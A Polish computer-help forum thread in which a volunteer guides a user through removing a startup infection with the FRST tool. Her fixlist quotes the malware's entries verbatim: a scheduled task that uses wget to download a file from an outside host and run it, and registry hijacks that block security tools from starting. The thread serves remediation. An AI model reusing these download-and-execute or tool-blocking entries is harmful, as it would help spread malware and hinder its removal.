Bersekr Opublikowano 17 Września 2015 Zgłoś Udostępnij Opublikowano 17 Września 2015 Dzień dobry szanownemu państwu, włączając dziś komputer zaraz po pojawieniu się ekranu wyskoczyło okno przeglądarki internetowej z taką oto stroną http://ifotos.pl/zobacz/Beztytulu_spaeprx.jpg System to Windows 7 64 sp1 postawiony na ssd. Logi mogłem tylko zrobić z GMER bo frst64 nie chce się włączyć. Proszę o pomoc w zwalczeniu tej infekcji. Logi.txt Odnośnik do komentarza
jessica Opublikowano 17 Września 2015 Zgłoś Udostępnij Opublikowano 17 Września 2015 Dzień dobry szanownemu państwu, włączając dziś komputer zaraz po pojawieniu się ekranu wyskoczyło okno przeglądarki internetowej z taką oto stroną http://ifotos.pl/zobacz/Beztytulu_spaeprx.jpg System to Windows 7 64 sp1 postawiony na ssd. Logi mogłem tylko zrobić z GMER bo frst64 nie chce się włączyć. Proszę o pomoc w zwalczeniu tej infekcji. zmień nazwę FRST na jakąś inną jessi Odnośnik do komentarza
Bersekr Opublikowano 17 Września 2015 Autor Zgłoś Udostępnij Opublikowano 17 Września 2015 Nazwa zmieniona i zadziałał więc oto logi. Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
jessica Opublikowano 17 Września 2015 Zgłoś Udostępnij Opublikowano 17 Września 2015 Otwórz Notatnik i wklej w nim: Task: {CDC3B8E6-C4FD-423A-9A92-05B6DA558A79} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grigle.in/index.php?data=MLDIhWCfJS;PowerISO6-x64-Full.exe;1432893265& start cmd /R dat.bmp <==== UWAGA HKLM-x32\...\Run: [] => [X]HKLM-x32\...\Run: [CMD] => cmd.exe /c start http://gangnamgame.org&& exit IFEO\adwcleaner_5.005.exe: [Debugger] svchost.exeIFEO\AnVir.exe: [Debugger] svchost.exeIFEO\AutoLogger.exe: [Debugger] svchost.exeIFEO\avz.exe: [Debugger] svchost.exeIFEO\CCleaner.exe: [Debugger] svchost.exeIFEO\CCleaner64.exe: [Debugger] svchost.exeIFEO\FRST.exe: [Debugger] svchost.exeIFEO\FRST64.exe: [Debugger] svchost.exeIFEO\HiJackThis.exe: [Debugger] svchost.exeIFEO\mbam.exe: [Debugger] svchost.exeIFEO\regedit.exe: [Debugger] svchost.exeIFEO\RegWorks.exe: [Debugger] svchost.exeIFEO\RSIT.exe: [Debugger] svchost.exeIFEO\RSITx64.exe: [Debugger] svchost.exeReg: reg delete "HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes" /fReg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /fReg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /fBHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> Brak plikuEmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe (a właściwie obok "soft.exe"Uruchom FRST i kliknij przycisk Fix (NAPRAW).Powstanie plik fixlog.txt.Daj ten log. jessi Odnośnik do komentarza
Bersekr Opublikowano 17 Września 2015 Autor Zgłoś Udostępnij Opublikowano 17 Września 2015 Oto log Fixlog.txt Odnośnik do komentarza
jessica Opublikowano 17 Września 2015 Zgłoś Udostępnij Opublikowano 17 Września 2015 Powinno już być OK, więc kończymy: Otwórz Notatnik i wklej w nim: DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW).przez SHIFT+DEL usuń pozostały folder C:\FRST. jessi Odnośnik do komentarza
Bersekr Opublikowano 17 Września 2015 Autor Zgłoś Udostępnij Opublikowano 17 Września 2015 Zrobione, wielkie dzięki za pomoc. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się